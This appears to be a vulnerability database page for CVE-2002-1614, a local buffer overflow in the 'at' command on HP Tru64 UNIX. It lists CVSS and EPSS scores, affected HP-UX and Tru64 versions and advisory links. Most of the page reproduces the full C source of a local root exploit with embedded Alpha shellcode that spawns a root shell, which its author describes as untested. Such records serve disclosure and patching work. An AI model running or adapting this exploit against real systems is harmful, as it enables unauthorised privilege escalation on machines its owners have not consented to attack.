CVE-2002-1614 : Detail

CVE-2002-1614

0.04%V3
Local
2005-03-25
04h00 +00:00
2017-07-10
12h57 +00:00

CVE Descriptions

Buffer overflow in HP Tru64 UNIX allows local users to execute arbitrary code via a long argument to /usr/bin/at.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 281

Publication date : 2001-03-01 23h00 +00:00
Author : Cody Tubbs
EDB Verified : Yes

/*
 * Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA]
 *
 * Author: Cody Tubbs (loophole of hhp).
 * Site: www.hhp-programming.net
 * Email: [email protected]
 * Date: 2/1/2000.
 *
 * I made this without access to gdb, It's untested...
 * may require modification, may require deletion, heh.
 *
 * Note: executable_stack must be on.
 */

#include <stdio.h>
#include <string.h>

#define OFFSET 0
#define ALLIGN 0
#define NOP "\x1f\x04\xff\x47"
#define DBUF 8000 // 5604+4+528? Manipulate if needed.

char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0);
  "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42\xfc\xff\x32"
  "\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2\xff\x47\x3f\x26\x1f\x04"
  "\x31\x22\xfc\xff\x30\xb2\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11"
  "\x14\xe3\x43\x20\x35\x20\x42\xff\xff\xff\xff"
  "\x30\x15\xd9\x43\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e"
  "\xb6\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22\x13\x05"
  "\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26\x2f\x62\x73\x22\x38"
  "\xff\x7e\xb2\x13\x94\xe7\x43\x20\x35\x60\x42\xff\xff\xff\xff";
  //Taeho Oh shellcode.

//long get_sp(void){ __asm__("bis $31,$30,$0");}

void usage(char *arg)
{
  fprintf(stderr, "\nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)");
  fprintf(stderr, " local root exploit. [ALPHA] \n");
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", arg);
  fprintf(stderr, "Examp: %s 0\n", arg);
  fprintf(stderr, "Examp: %s 0 1\n", arg);
  exit(1);
}

main(int argc, char **argv){
  char eipeip[DBUF], buffer[4096], heh[DBUF+1];
  char *nop;
  int i, offset, allign;
  long address;

  if(argc < 2){
    usage(argv[0]);
  }

  if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
  if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

  //address = get_sp() - offset;
  address = i& - offset;

  if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}}
  for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}

  nop=NOP;
  for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
    //buffer[i]=nop[i%4];
    buffer[i] = 0x1f;
    buffer[++i] = 0x04;
    buffer[++i] = 0xff;
    buffer[++i] = 0x47;
  }

  memcpy(buffer+i,shellcode,strlen(shellcode));
  memcpy(buffer,"ATEX=",5);
  putenv(buffer);

  fprintf(stderr,"Return address %#x, offset: %d.\n",address,offset);
  execlp("/usr/bin/at","at", eipeip, 0);
}

// milw0rm.com [2001-03-02]

Products Mentioned

Configuration 0

Hp>>Hp-ux >> Version 10.20

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.04

Hp>>Hp-ux >> Version 11.11

Hp>>Hp-ux >> Version 11.22

Hp>>Tru64 >> Version 4.0f

Hp>>Tru64 >> Version 4.0g

Hp>>Tru64 >> Version 5.0a

Hp>>Tru64 >> Version 5.1

Hp>>Tru64 >> Version 5.1a

References

http://www.kb.cert.org/vuls/id/435611
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/archive/1/290115
Tags : mailing-list, x_refsource_BUGTRAQ